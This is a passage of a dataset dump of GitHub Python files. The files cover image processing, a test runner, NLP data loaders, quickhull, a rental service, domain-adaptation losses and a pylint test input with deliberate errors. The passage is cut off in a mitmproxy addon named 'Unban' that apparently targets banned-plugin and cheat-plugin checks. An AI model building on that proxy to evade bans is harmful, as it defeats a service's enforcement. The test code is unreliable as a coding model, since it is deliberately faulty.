plt.show()\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# from matplotlib import pyplot as plt\n# import cv2\n# import numpy as np\n\n\n# def show_img(name, img):\n# plt.subplot(1,1,1)\n# plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n# plt.title(name, fontdict={'fontsize':16, 'color':'b'})\n# plt.show()\n\n\n# img = cv2.imread(szFileNmae)\n# img_h, img_w, _ = img.shape\n\n# # 这里调整,颜色范围局域的单个\n# lower = (10, 0, 0)\n# upper = (200, 255, 255)\n\n# blurred = cv2.GaussianBlur(img, (5, 5), 0)\n\n# hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n# # inRange的作用是根据阈值进行二值化:阈值内的像素设置为白色(255),阈值外的设置为黑色(0)\n# mask = cv2.inRange(hsv, lower, upper)\n\n# mask = cv2.erode(mask, None, iterations=2)\n\n# mask = cv2.dilate(mask, None, iterations=2)\n\n# contours, _hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n# max_i = 0\n# for i,cnt in enumerate(contours):\n# if cv2.contourArea(cnt) > cv2.contourArea(contours[max_i]):\n# max_i = i\n\n# peri = cv2.arcLength(contours[max_i], True)\n# approx = cv2.approxPolyDP(contours[max_i], 0.02 * peri, True)\n\n# # cv2.drawContours(img,[contours[max_i]],0,(255,0,0),10)\n\n# # 这四个点为原始图片上数独的位置\n# pts_o = np.float32([approx[0][0], approx[1][0], approx[2][0], approx[3][0]])\n# # 这是变换之后的图上四个点的位置\n# pts_d = np.float32([[img_w, 0], [0, 0], [0, img_h], [img_w, img_h]])\n\n# M = cv2.getPerspectiveTransform(pts_o, pts_d)\n\n# dst = cv2.warpPerspective(img, M, (img_w, img_h)) \n \n# # show_img(\"src\", img)\n# show_img(\"dst\", dst)","repo_name":"hktalent/myocr","sub_path":"fixScanImg.py","file_name":"fixScanImg.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20817527507","text":"import os\nimport re\nimport sys\nimport webbrowser\nfrom datetime import datetime as dt\nfrom setup import setup; setup()\n\nimport framework\nfrom framework.TestCase import TestCase\n\n# Allow command-line selection of tests to run\nif len(sys.argv) > 1:\n\ttests_to_run = sys.argv[1:]\n\tframework.TESTS = filter(lambda x: x[0] in tests_to_run, framework.TESTS)\n\n# Time of test\nrunning_time = dt.now()\n\n# Report Name\nreport_name = \"report_%s.html\" % running_time.strftime(\"%Y%m%d%H%M%S\")\n\n# Open a fill in top part of reports template and\n# write it to results.html\nf = open(framework.ROOT_DIR + '/framework/assets/templates/top.html', 'r')\ntop = f.read() % (running_time.strftime(\"%x at %X\"), running_time.strftime(\"%x at %X\"))\n#top = top.replace(\"{ROOT_DIR}\", framework.ROOT_DIR)\nf.close()\n\nf = open(framework.REPORTS_DIR + report_name, 'w')\nf.write(top)\nf.close()\n\nfor test in framework.TESTS:\n test_case = TestCase()\n test_case.parse(framework.TESTS_DIR + test[1])\n test_case.execute()\n test_case.report(framework.REPORTS_DIR + report_name)\n\n# write bottom of file\nf = open(framework.REPORTS_DIR + report_name, 'a')\nf.write(\"\")\nf.close()\n\n# open in web browser\nwebbrowser.open(\"file://\" + framework.REPORTS_DIR + report_name)\n\nsys.exit(0)\n","repo_name":"CSCI-362-03-2015/TeamToo","sub_path":"TestAutomation/scripts/runAllTests.py","file_name":"runAllTests.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5210166251","text":"import csv\nimport os\nfrom typing import Dict, List\n\nimport nltk\nimport torch\nimport torchtext\nfrom torch.utils.data import Dataset\n\ntwitter_label = {'negative': 0, 'neutral': 1, 'positive': 2}\n\n\nclass TwitterDataset(Dataset):\n \"\"\"https://www.kaggle.com/c/tweet-sentiment-extraction/data\"\"\"\n\n def __init__(self, split='train'):\n super().__init__()\n self.dataset = []\n if split == 'train':\n data_path = os.path.join('ALPS_2021/data/train.csv')\n elif split == 'val':\n data_path = os.path.join('ALPS_2021/data/test.csv')\n with open(data_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',',\n quoting=csv.QUOTE_MINIMAL)\n self.dataset.extend([line for line in csv_reader][1:])\n # 358bd9e861,\" Sons of ****, why couldn`t they put them on the\n # releases we already bought\",\"Sons of ****,\",negative\n for i in range(len(self.dataset)):\n self.dataset[i] = (self.dataset[i][1],\n twitter_label[self.dataset[i][-1]])\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n return self.dataset[item]\n\n\ndef get_embeddings(embeddings_name: str,\n embedding_dim: int,\n special_tokens: List[str] = ['']):\n \"\"\"\n :return: a tensor with the embedding matrix - ids of words are from vocab\n \"\"\"\n if embeddings_name == 'glove':\n embeddings = torchtext.vocab.GloVe(dim=embedding_dim, name='6B')\n\n word_to_index = embeddings.stoi\n word_vectors = embeddings.vectors\n\n for token in special_tokens:\n word_to_index[token] = len(word_to_index)\n word_vectors = torch.cat([word_vectors, torch.zeros(1, embedding_dim)],\n dim=0)\n\n return torch.nn.Parameter(word_vectors, requires_grad=True), word_to_index\n\n\nclass EmbeddingsVocabTokenizer:\n def __init__(self, word_to_id, id_to_word):\n self.word_to_id = word_to_id\n self.id_to_word = id_to_word\n self.tokenizer = nltk.tokenize.word_tokenize\n self.pad_token_id = self.word_to_id['']\n self.mask_token_id = self.word_to_id['unk']\n\n def encode(self, text, max_length=-1, lower=True):\n tokens = self.tokenizer(text)\n if lower:\n tokens = [t.lower() for t in tokens]\n\n token_ids = [self.word_to_id[token] if token in self.word_to_id else\n self.word_to_id['unk'] for token in tokens]\n return token_ids[:max_length]\n\n def __len__(self):\n return len(self.word_to_id)\n\n def convert_ids_to_tokens(self, token_ids: List[int]) -> List[str]:\n return [self.id_to_word[token] for token in token_ids]\n\n\ndef collate_tweet(instances: List[Dict],\n tokenizer,\n return_attention_masks: bool = True,\n pad_to_max_length: bool = False,\n max_seq_len: int = 512,\n device='cuda',\n return_seq_lens: bool = False) -> List[torch.Tensor]:\n token_ids = [tokenizer.encode(_x[0], max_length=509) for _x in instances]\n if pad_to_max_length:\n batch_max_len = max_seq_len\n else:\n batch_max_len = max([len(_s) for _s in token_ids])\n padded_ids_tensor = torch.tensor(\n [_s + [tokenizer.pad_token_id] * (batch_max_len - len(_s)) for _s in\n token_ids])\n labels = torch.tensor([_x[1] for _x in instances], dtype=torch.long)\n\n output_tensors = [padded_ids_tensor]\n if return_attention_masks:\n output_tensors.append(padded_ids_tensor > 0)\n output_tensors.append(labels)\n output_tensors = list(_t.to(device) for _t in output_tensors)\n\n if return_seq_lens:\n seq_lengths = []\n for instance in output_tensors[0]:\n for _i in range(len(instance) - 1, -1, -1):\n if instance[_i] != tokenizer.pad_token_id:\n seq_lengths.append(_i + 1)\n break\n output_tensors.append(seq_lengths)\n\n return output_tensors\n","repo_name":"copenlu/ALPS_2021","sub_path":"tutorial_src/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"81"} +{"seq_id":"291450227","text":"from visualization.visualization_tool import *\nfrom additional_functions.additional_functions import *\nfrom copy import deepcopy\n\n\ndef calculate_distance(points, p_1, p_2):\n result = None\n for i in range(len(points)):\n if orientation(p_1, p_2, points[i]) == 1:\n if result is None or det(p_1, p_2, points[i]) < det(p_1, p_2, result):\n result = points[i]\n return result\n\n\ndef is_inside(p_1, p_2, p_3, p, epsilon):\n if det(p_1, p_2, p) > -epsilon and det(p_2, p_3, p) > -epsilon and det(p_3, p_1, p) > -epsilon:\n return True\n return False\n\n\ndef remove_points_inside(points, p_1, p_2, p_3, epsilon):\n new_points = []\n for p in points:\n if not is_inside(p_1, p_2, p_3, p, epsilon):\n new_points.append(p)\n points.clear()\n points += new_points\n\n\ndef recursive_quickhull(points, convex_hull, p_1, p_2, scenes, epsilon):\n if len(points) == 0:\n return []\n\n # adding scenes for visualization\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(convex_hull), color=\"blue\")],\n lines=[LinesCollection(deepcopy([[p_1, p_2]]), color=\"red\")]))\n\n p_3 = calculate_distance(points, p_1, p_2)\n if p_3 is None:\n return []\n points.remove(p_3)\n convex_hull.append(p_3)\n\n # adding scenes for visualization\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(convex_hull), color=\"blue\"),\n PointsCollection([p_3], color=\"red\")],\n lines=[LinesCollection(deepcopy([[p_1, p_2]]), color=\"red\")]))\n\n remove_points_inside(points, p_1, p_2, p_3, epsilon)\n\n # adding scenes for visualization\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(convex_hull), color=\"blue\")],\n lines=[LinesCollection([[p_1, p_2], [p_1, p_3], [p_2, p_3]], color=\"red\")]))\n\n # adding scenes for visualization\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(convex_hull), color=\"blue\")],\n lines=[LinesCollection([[p_2, p_3]], color=\"red\")]))\n\n return recursive_quickhull(points, convex_hull, p_1, p_3, scenes, epsilon) + [p_3] + \\\n recursive_quickhull(points, convex_hull, p_3, p_2, scenes, epsilon)\n\n\ndef quickhull_convex_hull(points, epsilon=10 ** (-12), write_to_file=False, filename=\"quickhull_result\"):\n if len(points) < 3:\n return None, None\n sorted_points = sorted(points, key=lambda x: x[0])\n p_1 = sorted_points[0]\n p_2 = sorted_points[-1]\n\n # creating scenes for visualization\n scenes = [Scene(points=[PointsCollection(deepcopy(sorted_points), color=\"black\")])]\n\n sorted_points.remove(p_1)\n sorted_points.remove(p_2)\n curr_hull = [p_1, p_2]\n convex_hull = [p_1] + recursive_quickhull(sorted_points, curr_hull, p_1, p_2, scenes, epsilon) + \\\n [p_2] + recursive_quickhull(sorted_points, curr_hull, p_2, p_1, scenes, epsilon)\n\n # adding scenes for visualization\n hull_lines = create_lines(convex_hull)\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(curr_hull), color=\"blue\")],\n lines=[LinesCollection(deepcopy(hull_lines), color=\"blue\")]))\n\n if write_to_file:\n with open(f'{filename}.txt', 'w') as file:\n for item in curr_hull:\n file.write(f\"{item}\\n\")\n return convex_hull, scenes\n","repo_name":"Szymon-Budziak/Geometric_algorithms_project","sub_path":"algorithms_with_visualisation/quickhull_convex_hull_algorithm.py","file_name":"quickhull_convex_hull_algorithm.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11857936525","text":"from entities.garage import Garage\n\nclass GarageService:\n garages = []\n\n def __init__(self, locator_service, renter_service, system_balance_service):\n self.renter_service = renter_service \n self.system_balance_service = system_balance_service\n self.locator_service = locator_service\n\n\n def register_garage(self, locator_document, rent_price, address, size):\n locator = self.locator_service.get_locator_by_document(locator_document)\n if (locator == None):\n print('Locador não encontrado')\n return\n\n garage_id = str(len(self.garages) + 1)\n garage = Garage(garage_id, locator._id, rent_price, address, size)\n self.garages.append(garage)\n return garage\n\n\n def find_garage_by_id(self, garage_id):\n for garage in self.garages:\n if (garage._id == garage_id):\n return garage\n\n\n def rent_garage(self, garage_id, renter_document):\n garage_found = self.find_garage_by_id(garage_id)\n\n if (garage_found == None):\n print('Garagem não encontrada')\n return\n\n renter = self.renter_service.get_renter_by_document(renter_document)\n if (renter == None):\n print('Locatário não encontrado')\n return\n\n garage_found.rent(renter._id)\n self.system_balance_service.charge_system_tax()\n print('Garagem locada com sucesso')\n return garage_found\n\n\n def cancel_rent(self, garage_id):\n garage_found = self.find_garage_by_id(garage_id)\n\n if (garage_found == None):\n print('Garagem não encontrada')\n return\n\n garage_found.cancel_rent()\n\n print('Locação cancelada com sucesso')\n return garage_found\n\n\n def search_garages_by_size(self, garage_size):\n garages_found = []\n\n for garage in self.garages:\n if (garage.size >= garage_size):\n garages_found.append(garage)\n\n if (len(garages_found) == 0):\n print('Não encontramos nenhuma garagem com o tamanho igual ou maior ao especificado')\n return\n\n print('Id\\t Tamanho \\t Preço \\t\\t Endereço')\n for garage in garages_found:\n print(garage._id, \"\\t\", garage.size, \"\\t\\t R$ \", garage.rent_price, \"\\t\\t\", garage.address)\n\n return garages_found\n\n def search_garages_by_renter(self, renter_document):\n renter = self.renter_service.get_renter_by_document(renter_document)\n if (renter == None):\n print('Locatário não encontrado')\n return\n\n garages_found = []\n for garage in self.garages:\n if (garage.renter_id == renter._id):\n garages_found.append(garage)\n\n if (len(garages_found) == 0):\n print('O locatário não tem garagens locadas no momento')\n return\n\n print('Id\\t Tamanho \\t Preço \\t\\t Endereço')\n for garage in garages_found:\n print(garage._id, \"\\t\", garage.size, \"\\t\\t R$ \", garage.rent_price, \"\\t\\t\", garage.address)\n","repo_name":"gabriel-amorim1/self-storage","sub_path":"services/garage_service.py","file_name":"garage_service.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36647849332","text":"#!.venv/bin/python\nimport csv\nimport json\n\nwith open('result.csv', 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=';')\n headers = next(csvreader)\n column = {}\n rows = {}\n for h in headers:\n column[h] = []\n\n for (i, row) in enumerate(csvreader):\n json_key = ''\n full_row = {}\n for (j, column) in enumerate(row):\n if (j == 0):\n json_key = column.strip()\n else:\n header = headers[j]\n full_row[header] = column.strip()\n\n rows[json_key] = full_row\n\nwith open('isinRisk.json', 'w') as outfile:\n json.dump(rows, outfile)\n\nwith open(\"isinRisk.js\", 'a') as file:\n file.write(\"window.isinRisk = %s\" % rows)\n","repo_name":"netzhoerer/csv_to_json_js","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33703636175","text":"# pylint:disable=R0201\n\nfrom OpenOrange import *\nfrom Document import Document\nfrom Label import Label\nfrom SQLTools import codeOrder, monthCode\nfrom datetime import datetime\n\nclass AlotmentDoc(Document):\n\n classattr = \"classattr\"\n\n def getRecorda(self):\n class newObj(object):\n Status = 1\n RootLabel = \"100\"\n SerNr = \"SerNr\"\n Labels = \"100,200\"\n TransDate = datetime.now().date()\n def name(self):\n return \"Alotment\"\n return newObj()\n\n def getExtra(self, val1, val2=\"2\", val3=\"3\", val4=4):\n specs = self.getRecorda()\n sql = \"WHERE?AND [al].{%s} IN ('%s')\\n\" % (\"SerNr\", \"','\".join([val1, val3, val2]))\n sql += \"WHERE?AND [al].{SerNr} = i|%i|\\n\" % specs.Status\n sql += \"WHERE?AND [al].TransDate < d|%s|\\n\" % specs.TransDate\n sql += \"WHERE?AND SerNr = \"\n if specs.Status == 1:\n sql += \"%s\" % val4\n if 1 in [0, 0]:\n pass\n else:\n sql += \"\"\n return sql\n\n def getExtra2(self, test):\n parent = self\n specs = self.getRecorda()\n mydict = {1:1, 2:2}\n mylist = [1, 2]\n listcomp = \"listcomp,\" + \"extra\"\n if test > 0:\n return specs.Status\n x = \"'%s' as test_date\\n, \" % date(\"\")\n x += \"'%s' as test_time\\n, \" % time(\"\")\n x += \"'%i' as test_len\\n, \" % len(specs.RootLabel)\n x += \"'%s' as test_map\\n, \" % \"','\".join(map(str, mylist))\n x += \"'%s' as test_keys\\n, \" % \"','\".join(mydict.keys())\n x += \"'%s' as test_subscript\\n,\" % [\"SerNr\",\"RoomType\"][specs.Status]\n #x += \"'%s' as test_classattr\\n, \" % self.classattr\n x += '\"%s\" as test_dic\\n, ' % mydict\n x += \"'%s' as test_parentattr\\n, \" % parent.record #Parent None attribute\n x += '\"%s\" as test_binoplist\\n, ' % mylist #+ mylist\n x += '\"%s\" as test_listcomp1\\n, ' % \"\".join([a.strip() for a in listcomp.split(',')])\n x += '\"%s\" as test_listcomp2\\n, ' % \"\".join([d for d in listcomp])\n x += '\"%s\" as test_listcomp3\\n, ' % \"\".join([str(b) for b in listcomp])\n x += '\"%s\" as test_listcomp4\\n,' % \"\".join([c.strip() for c in listcomp])\n x += '\"%s\" as test_listcomp5\\n,' % [('s|%s|') % (z) for z in mylist]\n x += '\"%s\" as test_listcomp6\\n,' % \"\".join([y for y in (\"a\", \"b\")])\n # pylint:disable=E1101\n x += '\"%s\" as inferenceErr\\n,' % self.non.existant\n x += '\"%s\" as indexErr\\n' % mylist[2]\n return x\n\n def getExtra3(self):\n specs = self.getRecorda()\n subquery = Query()\n subquery.sql = \"SerNr\"\n return \"ORDER BY %s, %s\" % (specs.SerNr, subquery.sql)\n\n def getExtra4(self):\n specs = self.getRecorda()\n labels = None\n if specs.Labels:\n lis = []\n labs = specs.Labels.split(\",\")\n for lb in labs:\n lis.append(\"','\".join(Label.getTreeLeaves(lb)))\n labels = \"','\".join(lis)\n return \"WHERE?AND SerNr IN ('%s') \" % labels\n\n def getExtra5(self, txt):\n txt = txt.replace(\":1\",\"RoomType IS NULL\\n\")\n return txt\n\n def getExtra6(self):\n txt = \"\"\n q = {}\n q[\"one\"] = Query()\n q[\"one\"].sql = \"WHERE?AND SerNr IS NULL\\n\"\n q[\"two\"] = Query()\n q[\"two\"].sql = \"WHERE?AND SerNr IS NOT NULL\\n\"\n slist = [\"one\", \"two\"]\n for index in slist:\n txt += q[index].sql\n return txt\n\n def getExtra7(self):\n specs = self.getRecorda()\n factor = 0.0\n if 1 > 0:\n factor = (float(specs.Status) / float(specs.Status))\n txt = \"WHERE?AND (%s / 1) * %s > 0\\n\" % (1, factor)\n return txt\n\n def run(self):\n specs = self.getRecorda()\n leaves = Label.getTreeLeaves(specs.RootLabel)\n query7 = Query()\n query7.sql = \"SELECT SerNr, %s,\\n\" % codeOrder(\"SerNr\", leaves)\n query7.sql += monthCode(\"[al].TransDate\")\n query7.sql += \"\\n, %s, \\n\" % self.getExtra2(test=1)\n query7.sql += self.getExtra2(0)\n query7.sql += \"\\nFROM %s al\\n\" % specs.name()\n query7.sql += self.getExtra(\"1\", \"2\", val3=\"33\")\n query7.sql += self.getExtra4()\n query7.sql += self.getExtra5(\"WHERE?AND :1\")\n query7.sql += self.getExtra6()\n query7.sql += self.getExtra7()\n\n method = getattr(self, \"getExtra3____\"[:-4])\n query7.sql += method()\n query7.open()\n self.run2([100, 200])\n\n def run2(self, extraList):\n query2 = Query()\n query2.sql = self.getMore(extraList)\n query2.open()\n\n def getMore(self, moreList):\n return \"SELECT * FROM Alotment WHERE SerNr IN ('%s')\" % \"','\".join(moreList)\n","repo_name":"ancho85/pylint-playero-plugin","sub_path":"tests/input/func_noerror_query_getattr.py","file_name":"func_noerror_query_getattr.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12064095262","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom util.Weight import Weight\nclass NegativeLearningLoss(nn.Module):\n def __init__(self, threshold=0.05):\n super(NegativeLearningLoss, self).__init__()\n self.threshold = threshold\n\n def forward(self, predict):\n mask = (predict < self.threshold).detach()\n negative_loss_item = -1 * mask * torch.log(1 - predict + 1e-6)\n negative_loss = torch.sum(negative_loss_item) / torch.sum(mask)\n\n return negative_loss\n\nclass CORAL(nn.Module):\n def __init__(self):\n super(CORAL, self).__init__()\n\n def CORAL(self,source, target):\n d = source.data.shape[1]\n ns, nt = source.data.shape[0], target.data.shape[0]\n # source covariance\n # print('source',source.shape)#18, 1024]\n xm = torch.mean(source, 0, keepdim=True) - source\n xc = xm.t() @ xm / (ns - 1)\n\n # target covariance\n xmt = torch.mean(target, 0, keepdim=True) - target\n xct = xmt.t() @ xmt / (nt - 1)\n\n # frobenius norm between source and target\n loss = torch.mul((xc - xct), (xc - xct))\n loss = torch.sum(loss) / (4 * d * d)\n return loss\n\n def selecdata(self,feature, label):\n label_flatten = torch.flatten(label.squeeze(1), start_dim=0, end_dim=2)\n feature_flatten = torch.flatten(feature.permute((1, 0, 2, 3)), start_dim=1, end_dim=3)\n label_index = torch.nonzero(label_flatten)\n\n label_index = torch.flatten(label_index)\n label_index_rand = torch.randperm(label_index.nelement())\n label_index = label_index[label_index_rand]\n feature_flatten_select = feature_flatten[:, label_index[0]].unsqueeze(0)\n return feature_flatten_select, label_index, feature_flatten\n def forward(self, source, target,label_source,pred_target):\n chgthreshold=800\n unchgthreshold=800\n H, W = source.size(2), source.size(3)\n label_source = F.interpolate(label_source.unsqueeze(1).float(), size=(H, W), mode='bilinear', align_corners=False)\n pred_target = F.interpolate(pred_target.unsqueeze(1).float(), size=(H, W), mode='bilinear', align_corners=False)\n ones = torch.ones_like(label_source)\n zeros = torch.zeros_like(label_source)\n label_source = torch.where(label_source > 0.5, ones, zeros)\n pred_target = torch.where(pred_target > 0.5, ones, zeros)\n ############### change origin\n # source = (label_source.repeat([1, source.shape[1], 1, 1])).float()\n # target = (pred_target.repeat([1, target.shape[1], 1, 1])).float()\n source_chg_flatten_select,source_chg_index,source_chg_flatten=self.selecdata(source,label_source)\n target_chg_flatten_select,target_chg_index,target_chg_flatten=self.selecdata(target,pred_target)\n # one=torch.ones_like(source_chg_flatten[:,1])\n\n # print('source_chg_flatten_select',source_chg_flatten_select.shape)\n if source_chg_index.shape[0][bs,h,w,2]\n softmaxLabelori=softmaxLabel\n # print('softmaxLabelori',softmaxLabelori.shape,pseudo_label.shape)\n self.uu = (softmaxLabel[:, 0, :, :] * (1 - pseudo_label.squeeze(1))).sum() / ((1 - pseudo_label).sum() + 1)\n self.cc = ((softmaxLabel[:, 1, :, :]) * pseudo_label.squeeze(1)).sum() / (pseudo_label.sum() + 1)\n\n softmaxLabel = torch.flatten(softmaxLabelori.permute((0, 2, 3, 1)), start_dim=0, end_dim=2) # bs,2\n\n # softLogS = softLogS.reshape(-1, 2, s_label.shape[2], s_label.shape[3]) # [bs,2,h,w]->[bs,h,w,2]\n # softLogS = torch.flatten(softLogS.permute((0, 2, 3, 1)), start_dim=0, end_dim=2) # bs,2\n # softLogT = softLogT.reshape(-1, 2, s_label.shape[2], s_label.shape[3]) # [bs,2,h,w]->[bs,h,w,2]\n # softLogT = torch.flatten(softLogT.permute((0, 2, 3, 1)), start_dim=0, end_dim=2) # bs,2\n######################change\n source_chg_flatten_select, source_chg_index, source_chg_flatten = self.selecdata(source, s_label)\n ones=torch.ones_like(pseudo_label)\n zeros=torch.zeros_like(pseudo_label)\n\n pseudo_labeltChg=torch.where(softmaxLabelori[:,1,:,:].unsqueeze(1)>(p-pe),pseudo_label,zeros).detach()############################3############################3############################3############################3############################3\n # pseudo_labeltChg=torch.where((softmaxLabelori[:,1,:,:]/softmaxLabelori[:,1,:,:].max()).unsqueeze(1)>p,pseudo_label,zeros)\n # print('pseudo_label',pseudo_labeltChg.shape,pseudo_label.shape,pseudo_label.sum(),pseudo_labeltChg.sum())\n target_chg_flatten_select, target_chg_index, target_chg_flatten = self.selecdata(target, pseudo_labeltChg)\n\n\n if source_chg_index.shape[0] < chgthreshold or target_chg_index.shape[0] < chgthreshold:\n chgthreshold = np.minimum(source_chg_index.shape[0], target_chg_index.shape[0])\n source_chg_flatten_select = source_chg_flatten[source_chg_index[0:chgthreshold],:]#bs,c\n target_chg_flatten_select = target_chg_flatten[target_chg_index[0:chgthreshold],:]#bs,c\n # print(pp.shape,target_chg_flatten.shape)\n # target_pchg=pp[target_chg_index[0:chgthreshold].cpu(),:].unsqueeze(0)\n # print('target_p',target_p)\n softmaxLabel_chg_select = softmaxLabel[target_chg_index[0:chgthreshold]] # [bs,2]\n\n # softLogT_chg_select = softLogT[target_chg_index[0:chgthreshold]] # [bs,2]\n # softLogS_chg_select = softLogS[source_chg_index[0:chgthreshold]]\n # print(softmaxLabel_chg_select)\n # print('softmaxLabel_chg_select',softmaxLabel_chg_select.shape)\n # target_chg_flatten_selectW = target_chg_flatten_select * softmaxLabel_chg_select[:, 1].unsqueeze(1)\n####################unchg\n source_unchg_flatten_select, source_unchg_index, source_unchg_flatten = self.selecdata(source, 1 - s_label)\n # print('softmaxLabel',softmaxLabel.shape)\n pseudo_labeltunChg = torch.where(softmaxLabelori[:,0,:,:].unsqueeze(1)>p, pseudo_label, ones).detach()############################3############################3############################3############################3\n # pseudo_labeltunChg = torch.where((softmaxLabelori[:,0,:,:]/softmaxLabelori[:,0,:,:].max()).unsqueeze(1)>p, pseudo_label, ones)\n\n\n target_unchg_flatten_select, target_unchg_index, target_unchg_flatten = self.selecdata(target, 1 - pseudo_labeltunChg)\n\n\n if source_unchg_index.shape[0] < unchgthreshold or target_unchg_index.shape[0] < unchgthreshold:\n unchgthreshold = np.minimum(source_unchg_index.shape[0], target_unchg_index.shape[0])\n if unchgthreshold > chgthreshold:\n unchgthreshold = chgthreshold\n source_unchg_flatten_select = source_unchg_flatten[source_unchg_index[0:unchgthreshold], :] # bs,c\n # softLogS_unchg_select=softLogS[source_unchg_index[0:unchgthreshold]]\n\n target_unchg_flatten_select = target_unchg_flatten[target_unchg_index[0:unchgthreshold], :] # bs,c\n # target_punchg = pp[target_unchg_index[0:unchgthreshold].cpu(), :].unsqueeze(0)\n softmaxLabel_unchg_select = softmaxLabel[target_unchg_index[0:unchgthreshold]]\n # softLogT_unchg_select = softLogT[target_unchg_index[0:unchgthreshold]]\n # print('target_pchg',target_pchg.shape,target_punchg.shape)\n # target_unchg_flatten_selectW = target_unchg_flatten_select * softmaxLabel_unchg_select[:, 0].unsqueeze(1)#weight\n self.chgNum = chgthreshold\n self.unchgNum = unchgthreshold\n unchglabel = self.to_onehot(torch.zeros_like(softmaxLabel_unchg_select[:, 0]).long(), 2)\n chglabel = self.to_onehot(torch.ones_like(softmaxLabel_unchg_select[:, 1]).long(), 2)\n # print(unchglabel, chglabel)\n # print('s',softmaxLabel_unchg_select.shape,softmaxLabel_chg_select[1].shape,softmaxLabel_unchg_select[:,0].min(),softmaxLabel_chg_select[:,1].min())\n s_label_select = torch.cat([unchglabel,chglabel], dim=0).detach()\n # print('s_label_select',s_label_select)\n t_label_select = torch.cat([softmaxLabel_unchg_select,softmaxLabel_chg_select ], dim=0).detach()\n # print('softmaxLabel_unchg_select',t_label_select.shape)\n t_label_select2=torch.cat([softmaxLabel_unchg_select,softmaxLabel_chg_select ], dim=0).detach()\n # softLogS=torch.cat([softLogS_unchg_select,softLogS_chg_select], dim=0)\n # softLogT=torch.cat([softLogT_unchg_select,softLogT_chg_select], dim=0)\n\n # print('t_label_select2',t_label_select2.shape)\n return source_chg_flatten_select, source_unchg_flatten_select, target_chg_flatten_select, target_unchg_flatten_select, \\\n s_label_select, t_label_select, t_label_select2, []\n # return source_chg_flatten_select, source_unchg_flatten_select, target_chg_flatten_select, target_unchg_flatten_select,\\\n # s_label_select,t_label_select,t_label_select2,torch.cat([target_pchg,target_punchg],dim=0)","repo_name":"Fanrongbo/IRD-CD-UDA","sub_path":"util/metrics_DA.py","file_name":"metrics_DA.py","file_ext":"py","file_size_in_byte":16843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36234528137","text":"\"\"\"\n Draft. The idea is to have an alternative to the current list-of-list PyTree representation of a CGNS tree that is\n - backward compatible with the list-of-list (idea: inherit from `list` and rely on duck-typing)\n - offers `.name`, `.label`, `.value`, `.children` attributes, more explicit than [0], [3], [1], [2]\n - offers a `.parent` attribute that makes the tree backward iterable (i.e. a node can get access to its parents by itself) \n\n Advantages:\n - still very regular and lightweigh tree structure, independent from the SIDS\n - backward compatible\n - more explicit\n - we can have more check on admissible values\n - we can reconstruct the full path of a node without giving the root tree\n\n Limitations:\n - independent from the SIDS \n - good because no need to implement the SIDS\n - bad because no built-in checks related to the SIDS (\"class invariants\")\n - once a library function relies on more that the common PyTree interface (e.g. it uses `.parent`)\n then the function can't be called on a plain regular PyTree\n\"\"\"\n\nclass cgns_tree(list):\n def __init__(self, name, label, value, children, parent=None):\n self.name = name\n self.label = label \n self.value = value\n self.children = children\n self.parent = parent\n\n def child(self, i):\n _child = self.children[i]\n return cgns_tree(_child.name, _child.label, _child.value, _child.children, self)\n\n def __getitem__(self, i):\n if i==0:\n return self.name\n if i==1:\n return self.value\n if i==2:\n return self.children\n if i==3:\n return self.label\n raise RuntimeError()\n \n\ndef pytree_to_cgns_tree(pytree, parent=None):\n children = [pytree_to_cgns_tree(pytree_child) for pytree_child in pytree[2]]\n return cgns_tree(pytree[0], pytree[3], pytree[1], children)\n \n\ndef test_super_cgns_interface():\n pytree = ['Zone', [[9,0,0],[4,0,0],[0,0,0]], [['Hexa',[17],[],'Elements_t']], 'Zone_t']\n t = pytree_to_cgns_tree(pytree)\n\n # new interface\n assert t.name == 'Zone'\n hexa = t.child(0)\n assert hexa.name == 'Hexa'\n assert hexa.parent.name == 'Zone'\n\n # backward-compatible old interface\n assert t[0] == 'Zone'\n assert isinstance(t, list)\n","repo_name":"onera/Maia","sub_path":"maia/pytree/graph/test/test_alternative_cgns_interface.py","file_name":"test_alternative_cgns_interface.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"27808724620","text":"from mitmproxy import http\nimport json\nclass Unban:\n def __init__(self):\n self.bannedplugin_keyword='bannedplugin'\n self.chetplugin_keyword='cheatplugin'\n self.asset_meta_keyword='Asset/Meta'\n def 